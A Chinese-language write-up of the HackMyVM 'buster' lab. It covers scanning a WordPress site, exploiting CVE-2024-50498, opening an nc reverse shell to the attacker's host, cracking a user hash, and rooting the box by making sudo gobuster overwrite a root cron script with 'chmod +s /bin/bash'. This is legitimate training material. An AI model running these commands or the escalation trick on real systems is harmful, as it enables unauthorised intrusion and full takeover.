hackmyvm-buster

题目地址

信息收集

主机发现

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0e       (Unknown: locally administered)
192.168.56.100  08:00:27:b0:9b:6b       (Unknown)
192.168.56.105  08:00:27:da:56:11       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.157 seconds (118.68 hosts/sec). 3 responded

端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 07:33 EST
Nmap scan report for 192.168.56.105
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
|   256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_  256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: bammmmuwe
|_http-generator: WordPress 6.7.1
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:DA:56:11 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds

80端口开了一个http服务。是一个用wordpress搭建的站点。

用wpscan进行一些信息收集

最开始我只进行了wpscan --url http://192.168.56.105 -e u,ap没用使用--plugins-detection aggressive 模式。

对目标进行了好几次的信息收集，但是没有收集到任何漏洞信息

后来使wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive 发现网站存在一个CVE-2024-50498

┌──(root㉿LAPTOP-40PQI58C)-[/mnt/c/Users/legion]
└─# wpscan --url http://192.168.56.105 -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.105/ [192.168.56.105]
[+] Started: Mon Feb 24 20:36:52 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.105/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.105/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.105/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.105/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Outdated, released on 2024-11-21).
 | Found By: Meta Generator (Passive Detection)
 |  - http://192.168.56.105/, Match: 'WordPress 6.7.1'
 | Confirmed By: Rss Generator (Aggressive Detection)
 |  - http://192.168.56.105/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
 |  - http://192.168.56.105/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:14:12 <==================================> (109235 / 109235) 100.00% Time: 00:14:12
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.105/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://192.168.56.105/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.5 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/akismet/readme.txt

[+] feed
 | Location: http://192.168.56.105/wp-content/plugins/feed/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/feed/, status: 200
 |
 | The version could not be determined.

[+] wp-query-console
 | Location: http://192.168.56.105/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/wp-query-console/, status: 403
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.105/wp-content/plugins/wp-query-console/README.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] ta0
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.105/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] welcome
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Feb 24 20:51:12 2025
[+] Requests Done: 109276
[+] Cached Requests: 42
[+] Data Sent: 29.237 MB
[+] Data Received: 33.165 MB
[+] Memory used: 478.477 MB
[+] Elapsed time: 00:14:20

拿着payload直接打了,页面报错了

执行了phpinfo()页面正常

但是执行其他语句就都是400

我执行了var_dump(1)，虽然页面还是400 但是页面返回来了结果

在刚刚的返回的phpinfo()页面看到了禁用的函数

但是用反引号还是能执行命令

弹个shellnc -e /bin/sh 192.168.56.103 7777

拿到了www-data的权限

有一个叫welcome的普通用户。同时WordPress也有一个welcome的用户

上传一个php文件连接数据库读取出WordPress数据库中的用户与密码

刚看到这里的时候，脑子一抽。想着将加密的密码更新为已知的密码。

然后

突然间想起来 这里的welcome的密码可能就是系统用户welcome的密码

就拿了密码 用jhon去爆破

┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# john --show hash                     
?:104567

1 password hash cracked, 0 left

然后通过ssh 顺利登录系统

┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm]
└─# ssh welcome@192.168.56.105
Linux listen 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb 24 04:57:16 2025 from 192.168.56.103
$ whoami
welcome

sudo -l 看到/usr/bin/gobuster不需要密码就可以使用sudo

$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster

最开始是没有什么思路的

突然间想到可以将 /root/root.txt文件指定为字典

在kali上用python -m http.server起一个http服务

然后执行

sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt

很不幸root's flag的名字不叫root.txt

$ sudo gobuster -u "http://192.168.56.101:8080" -w /root/root.txt
2025/02/24 08:12:20 [!] 1 error occurred:
        * Wordlist (-w): File does not exist: /root/root.txt

下一个pspy看看

root用户会定时执行/opt/.test.sh

这里突然间想到了

可以用python起一个htpp服务器然后在里面依次放入bin chmod +s bin bash文件夹以及文件

┌──(root㉿kali)-[/home/kali/Desktop/hackmyvm/empty]
└─# tree
.
└── bin
    └── chmod +s 
        └── bin
            └── bash

4 directories, 1 file

然后创建一个字典文件里面只写bin/chmod +s /bin/bash

$ cat 1
bin/chmod +s /bin/bash

然后执行sudo /usr/bin/gobuster -u http://192.168.56.103:8000/ -w /home/welcome/1 -o res

welcome@listen:~$ cat res
/bin/chmod +s /bin/bash (Status: 200)
welcome@listen:~$ 

得到的结果是我们想要的

但是多了一个 (Status: 200)

后来我才知道-n参数可以忽略吊响应码

在命令后加一个-n参数后

welcome@listen:~$ cat res
/bin/chmod +s /bin/bash
welcome@listen:~$ 

后面没任何东西了

刚好是我们想要的

接下来就是把他加入到/opt/.tets.sh中

执行sudo /usr/bin/gobuster -u "http://192.168.56.103:8000/" -w /home/welcome/1 -o /opt/.test.sh -n

再看/bin/bash的权限,已经加上了s位

welcome@listen:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
welcome@listen:~$ 

之后执行 bash -p就是root权限了

welcome@listen:~$ bash -p
bash-5.0# whoami
root
bash-5.0# id
uid=1001(welcome) gid=1001(welcome) euid=0(root) egid=0(root) groups=0(root),1001(welcome)
bash-5.0#